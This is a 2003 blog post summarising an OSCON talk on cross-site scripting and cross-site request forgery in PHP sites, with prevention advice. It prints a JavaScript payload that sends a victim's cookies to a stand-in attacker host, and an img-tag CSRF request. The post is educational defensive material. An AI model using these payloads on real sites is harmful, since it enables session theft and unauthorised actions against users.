Charles Engelke's Blog

July 14, 2003

PHP Under Attack

Filed under: Ricardo Havill — Charles Engelke @ 10:15 pm

During his Thursday session at OSCON 2003, Chris Shifflett explained two types of
security vulnerabilities that may exist in a web site. The examples presented used
the PHP programming language, but these vulnerabilities may occur in CGI programs
written in any language. A copy of the presentation should be available
here.

Cross Site Scripting

Cross Site Scripting (XSS) exploits the trust a user has for a web site. It
usually involves sites displaying foreign data such as web mail applications,
web forums and guest books. XSS may be used to trick a user into executing malicious
scripts and to steal cookies. Web sites often use cookies to determine whether a
user has authorization to perform certain actions. The following Javascript code
may be used by a hacker to steal a user’s cookies:


&lt script&gt
document.location = "http://evil-cookie-monster.org/stealcookies.cgi?cookies=" + document.cookie
&lt/script&gt

Preventing XSS

The best way to prevent XSS is to filter all data a user posts to a web site. The PHP
language has built in functions to filter data (htmlentities(), strip_tags(),
utf8_decode(), etc.)

Cross Site Request Forgery

Cross Site Request Forgery (CSRF) exploits the trust a web site has for a particular user.
It involves tricking a user into unknowingly sending a HTTP request of the attacker’s
choosing to the vulnerable web site. CSRF is harder to defend against than XSS.
The following example demonstrates CSRF:

  1. A trusted user logs into http://top-secret-site.com/vulnerable.cgi
  2. The user is tricked into visiting a malicious site.
  3. The malicious web site sends the user the followig HTML:


    &lt img src="http://top-secret-site.com/vulnerable.cgi?action=trusteduseraction&user=gullibledude"&gt
Preventing CSRF
  1. Use POST instead of GET in forms
  2. Use $_POST instead of register_globals in PHP
  3. Try to force use of your own forms (make sure your site’s form page was loaded before
    accepting its parameters). One way to do this is to generate a random string, store the
    random string in a database or a text file and place the string in the form as a hidden
    variable. When receving form parameters from a user, make sure they submitted
    the random string.
Advertisement

Create a free website or blog at WordPress.com.

%d bloggers like this: